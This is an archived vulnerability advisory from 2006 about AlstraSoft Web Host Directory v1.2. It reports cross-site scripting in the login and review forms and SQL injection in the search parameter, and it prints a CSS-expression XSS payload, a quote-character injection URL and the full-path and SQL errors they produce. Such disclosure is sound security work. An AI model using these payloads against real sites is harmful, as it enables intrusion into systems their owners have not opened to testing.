Bug: AlstraSoft Web Host Directory v1.2 ( Ascii Version )

Search:
WLB2

AlstraSoft Web Host Directory v1.2

Published
Credit
Risk
2006.05.27
luny youfucktard com
Low
CWE
CVE
Local
Remote
N/A
CVE-2006-2618
CVE-2006-2617
CVE-2006-2616
No
Yes

AlstraSoft Web Host Directory v1.2

Homepage:

http://www.alstrasoft.com/

((It should be noted too that the demo for this script is on a different domain which also sells a WebHost Directory
which looks to be the same product/company called HyperStop WebHost Directory 1.2. Both scripts seem to be the same))

Effected files:

Login form of script.

Search form of script.

Review form of script.

------------------------------------------

Exploits & Vulns:

Inserting html codes in the login form such as:

<DIV STYLE="width: expression(alert('XSS'));">

produces the following full path error:

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /home/username/public_html/

demo/webhost/include/login.php on line 6

---------------------------

URL Injection of the search url reveals SQL Query error:

Example:

http://www.example.com/demo/webhost/search/?uri='

Unknown column 'p.' in 'where clause'

[SELECT COUNT(*) FROM `hsl_plan` p LEFT JOIN `hsl_host` h ON p.hid=h.hid WHERE p.status=1 AND p.``='']

--------------------------

Input data isn't filtered in the write a review box. This in turn can cause a XSS. For proof of concept, just try
putting

<DIV STYLE="width: expression(alert('XSS'));"> in as the review text and then login in as the admin and
view your review. Reviews have an option to be auto approved too.

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version